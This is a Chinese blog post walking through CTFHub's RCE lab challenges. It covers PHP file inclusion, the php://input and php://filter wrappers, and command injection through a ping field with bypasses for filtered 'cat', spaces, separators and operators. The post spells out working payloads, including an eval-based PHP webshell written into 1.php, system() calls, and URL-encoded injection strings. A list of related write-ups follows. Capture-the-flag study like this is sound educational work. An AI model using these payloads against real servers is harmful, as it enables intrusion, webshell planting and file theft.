ctfhub-RCE-文件包含 ,php://input,远程包含​,​ 读取源代码, 命令注入,过滤cat,过滤空格,过滤目录分隔符,过滤运算符,综合过滤练习

最新推荐文章于 2024-05-17 10:20:39 发布
最新推荐文章于 2024-05-17 10:20:39 发布
阅读量3.8k 收藏 5
点赞数
文章标签: php 安全 web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_55702959/article/details/122770194
版权

目录

文件包含

 php://input

php://input 伪协议

远程包含

​​ 

 读取源代码

 命令注入

过滤cat

过滤空格

过滤目录分隔符

过滤运算符

综合过滤练习

文件包含

打开题目发现代码中有shell.txt直接点击shell打开在post发现是没用的,于是换个方式在?file=shell.txt

进行post

 

 

 

 php://input

php:// 输入输出流
PHP 提供了一些杂项输入/输出(IO)流,允许访问 PHP 的输入输出流、标准输入输出和错误描述符, 内存中、磁盘备份的临时文件流以及可以操作其他读取写入文件资源的过滤器。
php://filter(本地磁盘文件进行读取)
元封装器,设计用于”数据流打开”时的”筛选过滤”应用,对本地磁盘文件进行读写。

php://input 伪协议

该伪协议可以将post的数据交给服务器当成文件接收


---------------------------------------------------------

 

<?php system(“ls /”)?>

 

 

 

远程包含

 

 

 读取源代码

php://filter(本地磁盘文件进行读取)
元封装器,设计用于”数据流打开”时的”筛选过滤”应用,对本地磁盘文件进行读写。

-----------------------------------------

?file=php://filter/resource=/flag

 命令注入

命令注入攻击 ,是指由于Web应用程序对用户提交的数据过滤不严格,导致黑客可以通过构造特殊命令字符串的方式,将数据提交至Web应用程序中,并利用该方式执行外部程序或系统命令实施攻击,非法获取数据或者网络资源等。

在命令注入的漏洞中,最为常见的是PHP的命令注入.

Commad Inject漏洞产生原因及如何注入:

在web程序中,因为业务功能需求,需要通过web前端传递参数到后台服务器上执行(特别是一些网络设备的web管理界面),但由于开发人员没有对输入进行严格的过滤,导致攻击着可以构造一些额外的“带有非法目的”的命令,欺骗后台服务器执行,造成破坏。

127.0.0.1 &echo "<?php @eval(\$_POST['shell']);?>" >> 1.php

注意::POST函数前面有一个\如果不写这个的话,一句话木马就不管用

构造一句木马,在题目方框中输入,之后再用

127.0.0.1&ls

检查是否已经输入

 然后用蚁剑就可以找到flag了

过滤cat

与 命令注入的方法一毛一样

过滤空格

先在题目空格中输入

127.0.0.1 &echo "<?php @eval(\$_POST['shell']);?>" >> 1.php

在输入

127.0.0.1&ls

方向flag文件

在输入

127.0.0.1&cat<flag_32454182944758.php

 打开原代码就可以发现flag

过滤目录分隔符

首先输入

127.0.0.1&ls

在输入

127.0.0.1;cd flag_is_here;ls

 在输入

127.0.0.1;cd flag_is_here;cat flag_16617156904804.php

 查看源代码就OK啦

过滤运算符

先输入

127.0.0.1&ls

在输入

127.0.0.1;cat flag_515549425495.php

查看原代码

综合过滤练习

   %0a 代替 换行 , %09 代替 TAB键 (因为flag被过滤了,所以我们通过TAB来补全flag_is_here) %5c 代替 \(用 \ 来分隔开 cat ,因为 cat 也被过滤了qwq)

url补充表:

 

 

 发现直接在框中输入无用,所以要该url

首先输入

?ip=127.0.0.1%0als

 在输入

?ip=127.0.0.1%0Als%09*is_here

 在输入

?ip=127.0.0.1%0Acd%09*_is_here%0Aca\t%09*_25276446429372.php

 查看源代码发现flag

daphne31
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTFHubRCEphp://input
cx_sam的博客
08-09 541
CTF WEB RCE php://input
题解记录-CTFHub技能树|Web|RCE
weixin_57448435的博客
09-15 787
RCE漏洞,Hackbar插件的使用,cmd命令运算符空格、关键字flag、cat
CTFHUB-技能树-Web题-RCE远程代码执行)-文件包含-php://input
最新发布
Static______的博客
05-17 529
php://filter和php://inputphp://filter用于读取源码,php://input用于执行php代码。代码中说如果file 名中六个字符是 “php://” 就执行后面的include函数。因为php://input是执行后面的PHP命令所以要写成php代码形式。正数 - 从 start 参数所在的位置返回。这里其实就应该想到的是php://伪协议。负数 - 在从字符串结尾的指定位置开始。0 - 在字符串中的第一个字符处开始。正数 - 在字符串的指定位置开始。
CTFHub技能树web(持续更新)--RCE--文件包含--php://input
jiuyongpinyin的博客
01-25 1110
php://input 做了两道题才知道自己对于文件包含这里完全没有什么思路,所以还是参考了大神的链接 大神链接:点我看大神链接 这道题打开的题目页: 代码的意思是检验在url的get传参中有没有file这个参数,如果有,从第0位开始,长度必须为6的参数值必须是php://(不知道我这么说,说的清不清楚),符合条件就传入,不符合就返回Hacker。 所以参考了大神链接后,get传入参数flie=php://input: [外链图片转存中…(img-z6pUNpjh-1611544235748)] yo
CTFHub技能树web(持续更新)--RCE--文件包含--远程文件包含
jiuyongpinyin的博客
01-26 2422
远程文件包含 根据题目的提示,我们知道这是远程文件包含,并对传入的参数进行了规定,也就是传参里面的flag对大小写不敏感(不过这个规定我个人感觉没啥用),首先尝试远程文件包含: 这里我用的是自己的VPS,发现远程文件包含的漏洞存在,那么接下来我们试试查看当前目录下的文件: 成功了,通过查找,flag在根目录下: 获取flag: 注:萌新第一次写write up,不足之处还请见谅,不对之处欢迎批评指正 ...
RCE过滤文件包含
weixin_51313108的博客
08-14 1344
ctf中的一些RCE过滤有关过滤的题目过滤的一些思考管道符的妙用;分号被过滤cat过滤空格过滤flag被过滤求助大佬博客 有关过滤的题目 BUUCTF pingpingping ctfhub RCE 过滤的一些思考 ctf题中会有一些SQL关键字的过滤,找到过滤的内容是非常有必要的。做题中如果可以查看到其他文件的代码或许可以知道过滤些什么关键字。(如:index.php,当前所在的php文件)。 管道符的妙用 ; & && | ||:这些管道符衔接其他命令可以执行一些Linux代
第52天:代码审计-PHP项目类RCE文件包含下载删除1
08-03
本文主要探讨了PHP项目中常见的安全漏洞类型,包括远程代码执行(RCE)、文件包含、下载、删除等,并提供了相关的漏洞利用关键字和实例分析。 首先,SQL注入是由于不当处理用户输入导致的数据库操作漏洞。关键词如`...
CVE-2020-0796-RCE-POC:CVE-2020-0796远程执行代码POC
03-19
CVE-2020-0796远程执行代码POC (c)2020 ZecOps,Inc.- ://www.zecops.com-查找攻击者的错误CVE-2020-0796 /“ SMBGhost”的远程代码执行POC预期结果:具有系统访问权限的反向Shell。仅用于公司环境中的教育和测试...
xml执行java源码-Axis-1.4-RCE-Poc:Axis<=1.4远程命令执行(RCE)POC
06-06
远程命令执行(RCE) POC 环境准备 首先下载Axis1.4 本仓库有一个打包好的axis直接解压到tomcat webapps下即可 ,web-inf/web.xml 去掉AdminServlet注释 然后,server-config.wsdd文件开启enableRemoteAdmin (本地...
Bypass-PHP-GD-Process-To-RCE:参考
06-14
绕过-PHP-GD-Process-To-RCE 描述 使用 Similar-Block-Attack 绕过 PHP-GD 进程到 RCE。 用法 用法: php codeinj.php <src> <inj> php codeinj.php demo.gif "<?php phpinfo();?>" 然后新图像“gd_demo.gif...
CVE-2020-14882&14883:Weblogic RCE复现1
08-03
声明:请勿用作违法用途,否则后果自负0x01 简介用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。0x02 漏洞概述编
CTFHub php://input
人若无名,便可专心练剑
08-16 385
用于读取源码用于执行php代码。
文件包含漏洞(input、filter、zip)
m0_70349048的博客
03-17 1186
可以访问请求的原始数据的只读流,将请求的数据当作php代码执行。当传入的参数作为文件名打开时,可以将参数设为php://input,同时post想设置的文件内容,php执行时会将post内容当作文件内容。从而导致任意代码执行。先访问这个页面然后抓包进行上传并访问恶意代码,可以看到phpinfo()已经执行。
fileclude(文件包含漏洞及php://inputphp://filter的使用)
Welcome To Myon'Blog !
04-16 4045
fileclude、文件包含漏洞、php://inputphp://filter、file_get_contents() 函数、empty()函数、isset函数、PHP伪协议
文件包含————ctfhubphp://input
qq_45655564的博客
05-29 3037
php://input php输入流php://input的使用分析 CTFHUBphp:input 首先看到代码 <?php if (isset($_GET['file'])) { if ( substr($_GET["file"], 0, 6) === "php://" ) {#字符串的前6个必须是php://input include($_GET["file"]); } else { echo "Hacker!!!"; } } else
CTFhub 提取源代码
qq_41497476的博客
07-27 1345
<?php error_reporting(E_ALL); if (isset($_GET['file'])) { if ( substr($_GET["file"], 0, 6) === "php://" ) { include($_GET["file"]); } else { echo "Hacker!!!"; } } else { highlight_file(__FILE__); } ?> <hr> i don'
CTFHub远程执行RCE
m0_67392273的博客
03-19 3446
CTFHub远程执行RCE eval执行 命令注入 过滤cat 过滤空格 过滤目录分隔符 过滤运算符 综合过滤练习 文件包含 php://input 远程包含 读取源代码 eval执行 命令注入 127.0.0.1;cat 121931294031970.php 127.0.0.1;cat 121931294031970.php|base64 获得flag 过滤cat 其他查看文件的命令 127.0.0.1;ls 127.0.0.1;less flag_19839275141
文件包含漏洞+php伪协议
unexpectedthing的博客
11-11 6402
文章目录常见的文件包含函数基本绕过:利用php伪协议1.php://input2.php://filter3.data协议4.zip协议5.bzip2://协议6.zlib://协议7. phar://协议8..file协议日志包含介绍利用条件漏洞利用流程日志文件路径远程文件包含条件流程PHPSESSION包含包含/proc/self/environ文件包含临时文件过程包含上传文件绕过类型指定后缀绕过利用长度截断%00截断url指定前缀截断目录遍历编码参考文献 常见的文件包含函数 php文件包含函数有下面四
ctl文件去空格_CTF从入门到提升(十三)文件包含session及例题详解
weixin_39964869的博客
12-20 269
具体场景——session我们可以查一下手册,看看这个参数是默认开启:举例子通过上传一个orange作为key传一个值传给这个变量,放到file函数中,再去比对file函数读取结果文件中的第一行0前面六个字符串是否匹配,如果是orange就会作为包含,否则就会显示源代码。这道题的难点在于包含一个文件要控制里面的内容,file函数的作用是把一个整一个文件读到一个数据中去,filename要读取文件名...
ctfhub rce
09-01
你想了解关于 CTFHubRCE远程命令执行)相关内容吗?CTFHub 是一个针对CTF(Capture The Flag)竞赛的学习平台,而RCE是一种常见的漏洞类型之一。在CTFHub上,你可以学习如何发现和利用RCE漏洞来获取系统权限。这样的技能在网络安全领域特别重要。 请注意,RCE是一种违法行为,在未经授权的情况下进行RCE攻击是被禁止的。在学习过程中,请遵循合法和道德准则,并严禁将所学技术用于非法用途。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值